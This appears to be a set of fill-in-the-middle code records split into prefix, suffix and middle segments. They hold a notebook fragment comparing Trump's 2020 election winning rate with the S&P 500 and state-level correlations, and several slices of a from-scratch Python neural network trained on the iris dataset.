df['S&P 500'],
color='green')
ax2.scatter(df['date'],
df['S&P 500'],
c= -df['S&P 500'])
# Set title and labels for axes
ax.set_ylabel("S&P 500", color="green")
ax2.set_ylabel("Trump winning rate", color="blue")
ax.set(title = "Trump winning rate vs. S&P 500")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * There are some comovements between Trump's winning rate and S&P 500 before the end of September
# * The correlation between Trump's winning rate and S&P 500 becomes negative since around 9/29/2020
# In[24]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
ax.scatter(df['date'],
df['Trump'],
c= -df['Trump'])
ax.plot(df['date'],
df['Trump'],
color='blue')
ax2=ax.twinx()
df = idx_merge
ax2.plot(df['date'],
df['Average of all six indicators'],
color='green')
ax2.scatter(df['date'],
df['Average of all six indicators'],
c= -df['Average of all six indicators'])
# Set title and labels for axes
ax.set_ylabel("Average of all six indicators", color="green")
ax2.set_ylabel("Trump winning rate", color="blue")
ax.set(title = "Trump winning rate vs. Average of all six indicators")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * There are some comovements between Trump's winning rate and average of indicators before the mid August
#
# ### 4.2 Comovement between Trump's State Level Winning Rate and Economic Indicators
# In[25]:
pst_merge = pst_cat.reset_index().merge(pnt_win, on = 'date').merge(idx1, on ='date')
pst_corr = pst_merge.groupby('code')['winstate_inc','S&P 500'].corr().reset_index()
pst_corr = pst_corr[pst_corr['level_1']=='S&P 500'][['code','winstate_inc']]
# In[26]:
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with S&P 500",))
fig.update_layout(
title_text = 'Trump winning rate correlation with stock market',
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The states whose winning rates are highly positively correlated with S&P 500 are: OH, WI, OR...
# * The states whose winning rates are highly negatively correlated with S&P 500 are: NM, OK, KS...
# * States such as MD are not likely to be affected by stock market
# In[27]:
pst_merge = pst_cat.reset_index().merge(pnt_win, on = 'date').merge(idx, on ='date')
pst_corr = pst_merge.groupby('code')['winstate_inc','Average of all six indicators'].corr().reset_index()
pst_corr = pst_corr[pst_corr['level_1']=='Average of all six indicators'][['code','winstate_inc']]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with Average of all six indicators",))
fig.update_layout(
title_text = 'Trump winning rate correlation with economics indicators',
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The states whose winning rates are highly positively correlated with economics indicators are: OR, OH, CT...
# * The states whose winning rates are highly negatively correlated with economics indicators: NM, OK, KS...
# * States such as NE, VT, WY are not likely to be affected by economics indicators
| pst_sub = pst_cat[pst_cat['date'] == date]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_sub['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Winning Rate",))
fig.update_layout(
title_text = 'Trump winning rate by state:'+ str(date.date()),
geo_scope='usa', # limite map scope to USA
)
fig.show() | conditional_block |
MLP.py | import random
import math
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class NeuralNetwork:
# 3 layer network ----input----hidden----output
LEARNING_RATE = 0.5
# initialize NN
def __init__(self, num_inputs, num_hidden, num_outputs, hidden_layer_weights=None, hidden_layer_bias=None,
output_layer_weights=None, output_layer_bias=None):
self.num_inputs = num_inputs
self.hidden_layer = NeuronLayer(num_hidden, hidden_layer_bias)
self.output_layer = NeuronLayer(num_outputs, output_layer_bias)
self.init_weights_from_inputs_to_hidden_layer_neurons(hidden_layer_weights)
self.init_weights_from_hidden_layer_neurons_to_output_layer_neurons(output_layer_weights)
# self.inspect()
def init_weights_from_inputs_to_hidden_layer_neurons(self, hidden_layer_weights):
weight_num = 0
for h in range(len(self.hidden_layer.neurons)):
for i in range(self.num_inputs): # input layer
if not hidden_layer_weights:
# if no hidden_layer_weight---randomly pick a value
self.hidden_layer.neurons[h].weights.append(random.random())
else:
self.hidden_layer.neurons[h].weights.append(hidden_layer_weights[weight_num])
weight_num += 1
def init_weights_from_hidden_layer_neurons_to_output_layer_neurons(self, output_layer_weights):
weight_num = 0
for o in range(len(self.output_layer.neurons)):
for h in range(len(self.hidden_layer.neurons)): # hidden layer
if not output_layer_weights:
# if no output_layer_weight---randomly pick a value
self.output_layer.neurons[o].weights.append(random.random())
else:
self.output_layer.neurons[o].weights.append(output_layer_weights[weight_num])
weight_num += 1
def inspect(self): # print NN info
print('------')
print('* Inputs: {}'.format(self.num_inputs))
print('------')
print('Hidden Layer')
self.hidden_layer.inspect()
print('------')
print('* Output Layer')
self.output_layer.inspect()
print('------')
def feed_forward(self, inputs): # FP output
hidden_layer_outputs = self.hidden_layer.feed_forward(inputs) # hidden layer output-- to output layer
return self.output_layer.feed_forward(hidden_layer_outputs) # output layer output
def train(self, training_inputs, training_outputs):
self.feed_forward(training_inputs)
# BP
# 1. Output layer deltas Δ
pd_errors_wrt_output_neuron_total_net_input = [0]*len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)): #to every neuron in output layer
# ∂E/∂zⱼ=∂E/∂a*∂a/∂z=cost'(target_output)*sigma'(z)
pd_errors_wrt_output_neuron_total_net_input[o] = self.output_layer.neurons[
o].calculate_pd_error_wrt_total_net_input(training_outputs[o])
# 2. Hidden layer Δ
pd_errors_wrt_hidden_neuron_total_net_input = [0]*len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
# dE/dyⱼ = Σ ∂E/∂zⱼ * ∂z/∂yⱼ = Σ ∂E/∂zⱼ * wᵢⱼ
d_error_wrt_hidden_neuron_output = 0
for o in range(len(self.output_layer.neurons)):
d_error_wrt_hidden_neuron_output += pd_errors_wrt_output_neuron_total_net_input[o]* \
self.output_layer.neurons[o].weights[h]
# ∂E/∂zⱼ = dE/dyⱼ * ∂zⱼ/∂
pd_errors_wrt_hidden_neuron_total_net_input[h] = d_error_wrt_hidden_neuron_output*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_input()
# 3. Update output neuron weights
for o in range(len(self.output_layer.neurons)):
for w_ho in range(len(self.output_layer.neurons[o].weights)):
# ∂Eⱼ/∂wᵢⱼ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢⱼ
pd_error_wrt_weight = pd_errors_wrt_output_neuron_total_net_input[o]*self.output_layer.neurons[
o].calculate_pd_total_net_input_wrt_weight(w_ho)
# Δw = α * ∂Eⱼ/∂wᵢ
self.output_layer.neurons[o].weights[w_ho] -= self.LEARNING_RATE*pd_error_wrt_weight
# 4. Update hidden neuron weights
for h in range(len(self.hidden_layer.neurons)):
for w_ih in range(len(self.hidden_layer.neurons[h].weights)):
# ∂Eⱼ/∂wᵢ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢ
pd_error_wrt_weight = pd_errors_wrt_hidden_neuron_total_net_input[h]*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_weight(w_ih)
# Δw = α * ∂Eⱼ/∂wᵢ
self.hidden_layer.neurons[h].weights[w_ih] -= self.LEARNING_RATE*pd_error_wrt_weight
def calculate_total_error(self, training_sets):
# calculate error
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
result = self.feed_forward(training_inputs)
# print('result is %s' % result)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
# total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuronLayer:
# layer
def __init__(self, num_neurons, bias):
# neuron in a layer have the same bias
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(num_neurons):
self.neurons.append(Neuron(self.bias))
# print layer info
self.inspect()
def inspect(self):
# print layer info
print('Neurons:', len(self.neurons))
for n in range(len(self.neurons)):
print(' Neuron', n)
for w in range(len(self.neurons[n].weights)):
print(' Weight:', self.neurons[n].weights[w])
print(' Bias:', self.bias)
def feed_forward(self, inputs):
# feed forward output, every neuron output (using the sigmoid)
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
def get_outputs(self):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
class Neuron:
# single neuron
def __init__(self, bias):
self.bias = bias
self.weights = []
def calculate_output(self, inputs): #single neuron output
self.input | sh(self.calculate_total_net_input())
return self.output
def calculate_total_net_input(self):
# z=W(n)x+b
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i]*self.weights[i]
return total + self.bias
# Use the sigmoid function as the activition function, which is the definition of the sigmoid function.
def squash(self, total_net_input):
return 1/(1 + math.exp(-total_net_input))
# δ = ∂E/∂zⱼ = ∂E/∂yⱼ * dyⱼ/dzⱼ 关键key
def calculate_pd_error_wrt_total_net_input(self, target_output):
return self.calculate_pd_error_wrt_output(target_output)*self.calculate_pd_total_net_input_wrt_input()
# The error for each neuron is calculated by the Mean Square Error method:
def calculate_error(self, target_output):
return 0.5*(target_output - self.output) ** 2
# = ∂E/∂yⱼ = -(tⱼ - yⱼ)
def calculate_pd_error_wrt_output(self, target_output):
return -(target_output - self.output)
# dyⱼ/dzⱼ = yⱼ * (1 - yⱼ)这是sigmoid函数的导数表现形式.
def calculate_pd_total_net_input_wrt_input(self):
return self.output*(1 - self.output)
# = ∂zⱼ/∂wᵢ = some constant + 1 * xᵢw₁^(1-0) + some constant ... = xᵢ
def calculate_pd_total_net_input_wrt_weight(self, index):
return self.inputs[index]
def load_data_set():
"""
read in data 5D add all 1s column
"""
iris = pd.read_csv('/Users/michael/Codes/bitbucket/cs584-s18-kaiyue-ma/AS2/data/iris.csv', encoding="gbk")
iris = iris.sample(frac=1.0)
dummy = pd.get_dummies(iris['Species'])
iris = pd.concat([iris, dummy], axis=1)
org_x = np.array(iris.iloc[:, 1:5])
# org_y = np.array(iris['setosa']).reshape(len(iris), 1)
org_y = np.array(iris['setosa'])
# data_arr, test_arr, label_arr, test_label = train_test_split(org_x, org_y, test_size=0.2, random_state=42)
#
# data_arr = data_arr.tolist()
# test_arr = test_arr.tolist()
# label_arr = label_arr.tolist()
# test_label = test_label.tolist()
#
# data_arr = np.dot(data_arr)
# one = np.ones(len(data_arr))
# data_arr = np.column_stack(one , data_arr)
# data_arr = data_arr.tolist()
#
# test_arr = np.dot(test_arr)
# one = np.ones(len(test_arr))
# test_arr = np.column_stack(one, test_arr)
# test_arr = test_arr.tolist()
x = org_x.tolist()
y = org_y.tolist()
x = np.mat(x)
one = np.ones(len(x))
x = np.column_stack((one, x))
x = x.tolist()
# print(data_arr)
# x1_2 = data_arr[:, 1]
# print(x1_2)
# print('.....')
# print(label_arr)
# return data_arr, test_arr, label_arr, test_label
return x, y
# training_sets = [
# [[0, 0, 0], [0]],
# [[0, 0, 1], [0]],
# [[0, 1, 0], [0]],
# [[1, 0, 0], [0]],
# [[0, 1, 1], [1]],
# [[1, 0, 1], [1]],
# [[1, 1, 0], [1]],
# [[1, 1, 1], [1]],
# ]
# training_sets = [
# [[0, 0], [0]],
# [[0, 1], [1]],
# [[1, 0], [1]],
# [[1, 1], [0]]
# ]
def data_trans():
train = []
x, y = load_data_set() # load dataset
# separate data into data and label
for idx,feature in enumerate(x):
train.append([feature,[y[idx]]])
print('done')
# separate data randomly into test and train
# xtrain, xtest, ytrain, ytest = load_data_set()
trainingset = random.sample(train,105)
testset = [f for f in train if f not in trainingset]
return trainingset , testset ,train
def test():
trainingset, testset, train = data_trans()
epoch = 80
nn = NeuralNetwork(len(train[0][0]), 10, len(train[0][1]))
for i in range(epoch):
for idx , trainfeatures in enumerate(trainingset):
randomtuple = random.choice(train)
training_inputs, training_outputs = randomtuple[0],randomtuple[1]
nn.train(training_inputs, training_outputs)
# print('epoch %d:, step:%d----error:%f'%(i, idx, nn.calculate_total_error([trainfeatures])))
# print(i, nn.calculate_total_error(train))
totaltesterror=0
for idx, testfeature in enumerate(testset):
singlerror = nn.calculate_total_error([testfeature])
# print('test error%f'%singlerror)
totaltesterror+=singlerror
print('epoch:%d, test error %f'%(i, totaltesterror/(idx+1)))
if __name__=="__main__":
test() | s = inputs
self.output = self.squa | identifier_body |
MLP.py | import random
import math
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class NeuralNetwork:
# 3 layer network ----input----hidden----output
LEARNING_RATE = 0.5
# initialize NN
def __init__(self, num_inputs, num_hidden, num_outputs, hidden_layer_weights=None, hidden_layer_bias=None,
output_layer_weights=None, output_layer_bias=None):
self.num_inputs = num_inputs
self.hidden_layer = NeuronLayer(num_hidden, hidden_layer_bias)
self.output_layer = NeuronLayer(num_outputs, output_layer_bias)
self.init_weights_from_inputs_to_hidden_layer_neurons(hidden_layer_weights)
self.init_weights_from_hidden_layer_neurons_to_output_layer_neurons(output_layer_weights)
# self.inspect()
def init_weights_from_inputs_to_hidden_layer_neurons(self, hidden_layer_weights):
weight_num = 0
for h in range(len(self.hidden_layer.neurons)):
for i in range(self.num_inputs): # input layer
if not hidden_layer_weights:
# if no hidden_layer_weight---randomly pick a value
self.hidden_layer.neurons[h].weights.append(random.random())
else:
self.hidden_layer.neurons[h].weights.append(hidden_layer_weights[weight_num])
weight_num += 1
def | (self, output_layer_weights):
weight_num = 0
for o in range(len(self.output_layer.neurons)):
for h in range(len(self.hidden_layer.neurons)): # hidden layer
if not output_layer_weights:
# if no output_layer_weight---randomly pick a value
self.output_layer.neurons[o].weights.append(random.random())
else:
self.output_layer.neurons[o].weights.append(output_layer_weights[weight_num])
weight_num += 1
def inspect(self): # print NN info
print('------')
print('* Inputs: {}'.format(self.num_inputs))
print('------')
print('Hidden Layer')
self.hidden_layer.inspect()
print('------')
print('* Output Layer')
self.output_layer.inspect()
print('------')
def feed_forward(self, inputs): # FP output
hidden_layer_outputs = self.hidden_layer.feed_forward(inputs) # hidden layer output-- to output layer
return self.output_layer.feed_forward(hidden_layer_outputs) # output layer output
def train(self, training_inputs, training_outputs):
self.feed_forward(training_inputs)
# BP
# 1. Output layer deltas Δ
pd_errors_wrt_output_neuron_total_net_input = [0]*len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)): #to every neuron in output layer
# ∂E/∂zⱼ=∂E/∂a*∂a/∂z=cost'(target_output)*sigma'(z)
pd_errors_wrt_output_neuron_total_net_input[o] = self.output_layer.neurons[
o].calculate_pd_error_wrt_total_net_input(training_outputs[o])
# 2. Hidden layer Δ
pd_errors_wrt_hidden_neuron_total_net_input = [0]*len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
# dE/dyⱼ = Σ ∂E/∂zⱼ * ∂z/∂yⱼ = Σ ∂E/∂zⱼ * wᵢⱼ
d_error_wrt_hidden_neuron_output = 0
for o in range(len(self.output_layer.neurons)):
d_error_wrt_hidden_neuron_output += pd_errors_wrt_output_neuron_total_net_input[o]* \
self.output_layer.neurons[o].weights[h]
# ∂E/∂zⱼ = dE/dyⱼ * ∂zⱼ/∂
pd_errors_wrt_hidden_neuron_total_net_input[h] = d_error_wrt_hidden_neuron_output*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_input()
# 3. Update output neuron weights
for o in range(len(self.output_layer.neurons)):
for w_ho in range(len(self.output_layer.neurons[o].weights)):
# ∂Eⱼ/∂wᵢⱼ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢⱼ
pd_error_wrt_weight = pd_errors_wrt_output_neuron_total_net_input[o]*self.output_layer.neurons[
o].calculate_pd_total_net_input_wrt_weight(w_ho)
# Δw = α * ∂Eⱼ/∂wᵢ
self.output_layer.neurons[o].weights[w_ho] -= self.LEARNING_RATE*pd_error_wrt_weight
# 4. Update hidden neuron weights
for h in range(len(self.hidden_layer.neurons)):
for w_ih in range(len(self.hidden_layer.neurons[h].weights)):
# ∂Eⱼ/∂wᵢ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢ
pd_error_wrt_weight = pd_errors_wrt_hidden_neuron_total_net_input[h]*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_weight(w_ih)
# Δw = α * ∂Eⱼ/∂wᵢ
self.hidden_layer.neurons[h].weights[w_ih] -= self.LEARNING_RATE*pd_error_wrt_weight
def calculate_total_error(self, training_sets):
# calculate error
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
result = self.feed_forward(training_inputs)
# print('result is %s' % result)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
# total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuronLayer:
# layer
def __init__(self, num_neurons, bias):
# neuron in a layer have the same bias
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(num_neurons):
self.neurons.append(Neuron(self.bias))
# print layer info
self.inspect()
def inspect(self):
# print layer info
print('Neurons:', len(self.neurons))
for n in range(len(self.neurons)):
print(' Neuron', n)
for w in range(len(self.neurons[n].weights)):
print(' Weight:', self.neurons[n].weights[w])
print(' Bias:', self.bias)
def feed_forward(self, inputs):
# feed forward output, every neuron output (using the sigmoid)
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
def get_outputs(self):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
class Neuron:
# single neuron
def __init__(self, bias):
self.bias = bias
self.weights = []
def calculate_output(self, inputs): #single neuron output
self.inputs = inputs
self.output = self.squash(self.calculate_total_net_input())
return self.output
def calculate_total_net_input(self):
# z=W(n)x+b
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i]*self.weights[i]
return total + self.bias
# Use the sigmoid function as the activition function, which is the definition of the sigmoid function.
def squash(self, total_net_input):
return 1/(1 + math.exp(-total_net_input))
# δ = ∂E/∂zⱼ = ∂E/∂yⱼ * dyⱼ/dzⱼ 关键key
def calculate_pd_error_wrt_total_net_input(self, target_output):
return self.calculate_pd_error_wrt_output(target_output)*self.calculate_pd_total_net_input_wrt_input()
# The error for each neuron is calculated by the Mean Square Error method:
def calculate_error(self, target_output):
return 0.5*(target_output - self.output) ** 2
# = ∂E/∂yⱼ = -(tⱼ - yⱼ)
def calculate_pd_error_wrt_output(self, target_output):
return -(target_output - self.output)
# dyⱼ/dzⱼ = yⱼ * (1 - yⱼ)这是sigmoid函数的导数表现形式.
def calculate_pd_total_net_input_wrt_input(self):
return self.output*(1 - self.output)
# = ∂zⱼ/∂wᵢ = some constant + 1 * xᵢw₁^(1-0) + some constant ... = xᵢ
def calculate_pd_total_net_input_wrt_weight(self, index):
return self.inputs[index]
def load_data_set():
"""
read in data 5D add all 1s column
"""
iris = pd.read_csv('/Users/michael/Codes/bitbucket/cs584-s18-kaiyue-ma/AS2/data/iris.csv', encoding="gbk")
iris = iris.sample(frac=1.0)
dummy = pd.get_dummies(iris['Species'])
iris = pd.concat([iris, dummy], axis=1)
org_x = np.array(iris.iloc[:, 1:5])
# org_y = np.array(iris['setosa']).reshape(len(iris), 1)
org_y = np.array(iris['setosa'])
# data_arr, test_arr, label_arr, test_label = train_test_split(org_x, org_y, test_size=0.2, random_state=42)
#
# data_arr = data_arr.tolist()
# test_arr = test_arr.tolist()
# label_arr = label_arr.tolist()
# test_label = test_label.tolist()
#
# data_arr = np.dot(data_arr)
# one = np.ones(len(data_arr))
# data_arr = np.column_stack(one , data_arr)
# data_arr = data_arr.tolist()
#
# test_arr = np.dot(test_arr)
# one = np.ones(len(test_arr))
# test_arr = np.column_stack(one, test_arr)
# test_arr = test_arr.tolist()
x = org_x.tolist()
y = org_y.tolist()
x = np.mat(x)
one = np.ones(len(x))
x = np.column_stack((one, x))
x = x.tolist()
# print(data_arr)
# x1_2 = data_arr[:, 1]
# print(x1_2)
# print('.....')
# print(label_arr)
# return data_arr, test_arr, label_arr, test_label
return x, y
# training_sets = [
# [[0, 0, 0], [0]],
# [[0, 0, 1], [0]],
# [[0, 1, 0], [0]],
# [[1, 0, 0], [0]],
# [[0, 1, 1], [1]],
# [[1, 0, 1], [1]],
# [[1, 1, 0], [1]],
# [[1, 1, 1], [1]],
# ]
# training_sets = [
# [[0, 0], [0]],
# [[0, 1], [1]],
# [[1, 0], [1]],
# [[1, 1], [0]]
# ]
def data_trans():
train = []
x, y = load_data_set() # load dataset
# separate data into data and label
for idx,feature in enumerate(x):
train.append([feature,[y[idx]]])
print('done')
# separate data randomly into test and train
# xtrain, xtest, ytrain, ytest = load_data_set()
trainingset = random.sample(train,105)
testset = [f for f in train if f not in trainingset]
return trainingset , testset ,train
def test():
trainingset, testset, train = data_trans()
epoch = 80
nn = NeuralNetwork(len(train[0][0]), 10, len(train[0][1]))
for i in range(epoch):
for idx , trainfeatures in enumerate(trainingset):
randomtuple = random.choice(train)
training_inputs, training_outputs = randomtuple[0],randomtuple[1]
nn.train(training_inputs, training_outputs)
# print('epoch %d:, step:%d----error:%f'%(i, idx, nn.calculate_total_error([trainfeatures])))
# print(i, nn.calculate_total_error(train))
totaltesterror=0
for idx, testfeature in enumerate(testset):
singlerror = nn.calculate_total_error([testfeature])
# print('test error%f'%singlerror)
totaltesterror+=singlerror
print('epoch:%d, test error %f'%(i, totaltesterror/(idx+1)))
if __name__=="__main__":
test() | init_weights_from_hidden_layer_neurons_to_output_layer_neurons | identifier_name |
MLP.py | import random
import math
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class NeuralNetwork:
# 3 layer network ----input----hidden----output
LEARNING_RATE = 0.5
# initialize NN
def __init__(self, num_inputs, num_hidden, num_outputs, hidden_layer_weights=None, hidden_layer_bias=None,
output_layer_weights=None, output_layer_bias=None):
self.num_inputs = num_inputs
self.hidden_layer = NeuronLayer(num_hidden, hidden_layer_bias)
self.output_layer = NeuronLayer(num_outputs, output_layer_bias)
self.init_weights_from_inputs_to_hidden_layer_neurons(hidden_layer_weights)
self.init_weights_from_hidden_layer_neurons_to_output_layer_neurons(output_layer_weights)
# self.inspect()
def init_weights_from_inputs_to_hidden_layer_neurons(self, hidden_layer_weights):
weight_num = 0
for h in range(len(self.hidden_layer.neurons)):
for i in range(self.num_inputs): # input layer
if not hidden_layer_weights:
# if no hidden_layer_weight---randomly pick a value
self.hidden_layer.neurons[h].weights.append(random.random())
else:
self.hidden_layer.neurons[h].weights.append(hidden_layer_weights[weight_num])
weight_num += 1
def init_weights_from_hidden_layer_neurons_to_output_layer_neurons(self, output_layer_weights):
weight_num = 0
for o in range(len(self.output_layer.neurons)):
for h in range(len(self.hidden_layer.neurons)): # hidden layer
if not output_layer_weights:
# if no output_layer_weight---randomly pick a value
self.output_layer.neurons[o].weights.append(random.random())
else:
self.output_layer.neurons[o].weights.append(output_layer_weights[weight_num])
weight_num += 1
def inspect(self): # print NN info
print('------')
print('* Inputs: {}'.format(self.num_inputs))
print('------')
print('Hidden Layer')
self.hidden_layer.inspect()
print('------')
print('* Output Layer')
self.output_layer.inspect()
print('------')
def feed_forward(self, inputs): # FP output
hidden_layer_outputs = self.hidden_layer.feed_forward(inputs) # hidden layer output-- to output layer
return self.output_layer.feed_forward(hidden_layer_outputs) # output layer output
def train(self, training_inputs, training_outputs):
self.feed_forward(training_inputs)
# BP
# 1. Output layer deltas Δ
pd_errors_wrt_output_neuron_total_net_input = [0]*len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)): #to every neuron in output layer
# ∂E/∂zⱼ=∂E/∂a*∂a/∂z=cost'(target_output)*sigma'(z)
pd_errors_wrt_output_neuron_total_net_input[o] = self.output_layer.neurons[
o].calculate_pd_error_wrt_total_net_input(training_outputs[o])
# 2. Hidden layer Δ
pd_errors_wrt_hidden_neuron_total_net_input = [0]*len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
# dE/dyⱼ = Σ ∂E/∂zⱼ * ∂z/∂yⱼ = Σ ∂E/∂zⱼ * wᵢⱼ
d_error_wrt_hidden_neuron_output = 0
for o in range(len(self.output_layer.neurons)):
d_error_wrt_hidden_neuron_output += pd_errors_wrt_output_neuron_total_net_input[o]* \
self.output_layer.neurons[o].weights[h]
# ∂E/∂zⱼ = dE/dyⱼ * ∂zⱼ/∂
pd_errors_wrt_hidden_neuron_total_net_input[h] = d_error_wrt_hidden_neuron_output*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_input()
# 3. Update output neuron weights
for o in range(len(self.output_layer.neurons)):
for w_ho in range(len(self.output_layer.neurons[o].weights)):
# ∂Eⱼ/∂wᵢⱼ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢⱼ
pd_error_wrt_weight = pd_errors_wrt_output_neuron_total_net_input[o]*self.output_layer.neurons[
o].calculate_pd_total_net_input_wrt_weight(w_ho)
# Δw = α * ∂Eⱼ/∂wᵢ
self.output_layer.neurons[o].weights[w_ho] -= self.LEARNING_RATE*pd_error_wrt_weight
# 4. Update hidden neuron weights
for h in range(len(self.hidden_layer.neurons)):
for w_ih in range(len(self.hidden_layer.neurons[h].weights)):
# ∂Eⱼ/∂wᵢ = ∂E/∂zⱼ * ∂zⱼ/∂wᵢ
pd_error_wrt_weight = pd_errors_wrt_hidden_neuron_total_net_input[h]*self.hidden_layer.neurons[
h].calculate_pd_total_net_input_wrt_weight(w_ih)
# Δw = α * ∂Eⱼ/∂wᵢ
self.hidden_layer.neurons[h].weights[w_ih] -= self.LEARNING_RATE*pd_error_wrt_weight
def calculate_total_error(self, training_sets):
# calculate error
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
result = self.feed_forward(training_inputs)
# print('result is %s' % result)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
# total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuronLayer:
# layer
def __init__(self, num_neurons, bias):
# neuron in a layer have the same bias
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(num_neurons):
self.neurons.append(Neuron(self.bias))
# print layer info
self.inspect()
def inspect(self):
# print layer info
print('Neurons:', len(self.neurons))
for n in range(len(self.neurons)):
print(' Neuron', n)
for w in range(len(self.neurons[n].weights)):
print(' Weight:', self.neurons[n].weights[w])
print(' Bias:', self.bias)
def feed_forward(self, inputs):
# feed forward output, every neuron output (using the sigmoid)
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
def get_outputs(self):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
class Neuron:
# single neuron
def __init__(self, bias):
self.bias = bias
self.weights = []
def calculate_output(self, inputs): #single neuron output
self.inputs = inputs
self.output = self.squash(self.calculate_total_net_input())
return self.output
def calculate_total_net_input(self):
# z=W(n)x+b
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i]*self.weights[i] |
# Use the sigmoid function as the activition function, which is the definition of the sigmoid function.
def squash(self, total_net_input):
return 1/(1 + math.exp(-total_net_input))
# δ = ∂E/∂zⱼ = ∂E/∂yⱼ * dyⱼ/dzⱼ 关键key
def calculate_pd_error_wrt_total_net_input(self, target_output):
return self.calculate_pd_error_wrt_output(target_output)*self.calculate_pd_total_net_input_wrt_input()
# The error for each neuron is calculated by the Mean Square Error method:
def calculate_error(self, target_output):
return 0.5*(target_output - self.output) ** 2
# = ∂E/∂yⱼ = -(tⱼ - yⱼ)
def calculate_pd_error_wrt_output(self, target_output):
return -(target_output - self.output)
# dyⱼ/dzⱼ = yⱼ * (1 - yⱼ)这是sigmoid函数的导数表现形式.
def calculate_pd_total_net_input_wrt_input(self):
return self.output*(1 - self.output)
# = ∂zⱼ/∂wᵢ = some constant + 1 * xᵢw₁^(1-0) + some constant ... = xᵢ
def calculate_pd_total_net_input_wrt_weight(self, index):
return self.inputs[index]
def load_data_set():
"""
read in data 5D add all 1s column
"""
iris = pd.read_csv('/Users/michael/Codes/bitbucket/cs584-s18-kaiyue-ma/AS2/data/iris.csv', encoding="gbk")
iris = iris.sample(frac=1.0)
dummy = pd.get_dummies(iris['Species'])
iris = pd.concat([iris, dummy], axis=1)
org_x = np.array(iris.iloc[:, 1:5])
# org_y = np.array(iris['setosa']).reshape(len(iris), 1)
org_y = np.array(iris['setosa'])
# data_arr, test_arr, label_arr, test_label = train_test_split(org_x, org_y, test_size=0.2, random_state=42)
#
# data_arr = data_arr.tolist()
# test_arr = test_arr.tolist()
# label_arr = label_arr.tolist()
# test_label = test_label.tolist()
#
# data_arr = np.dot(data_arr)
# one = np.ones(len(data_arr))
# data_arr = np.column_stack(one , data_arr)
# data_arr = data_arr.tolist()
#
# test_arr = np.dot(test_arr)
# one = np.ones(len(test_arr))
# test_arr = np.column_stack(one, test_arr)
# test_arr = test_arr.tolist()
x = org_x.tolist()
y = org_y.tolist()
x = np.mat(x)
one = np.ones(len(x))
x = np.column_stack((one, x))
x = x.tolist()
# print(data_arr)
# x1_2 = data_arr[:, 1]
# print(x1_2)
# print('.....')
# print(label_arr)
# return data_arr, test_arr, label_arr, test_label
return x, y
# training_sets = [
# [[0, 0, 0], [0]],
# [[0, 0, 1], [0]],
# [[0, 1, 0], [0]],
# [[1, 0, 0], [0]],
# [[0, 1, 1], [1]],
# [[1, 0, 1], [1]],
# [[1, 1, 0], [1]],
# [[1, 1, 1], [1]],
# ]
# training_sets = [
# [[0, 0], [0]],
# [[0, 1], [1]],
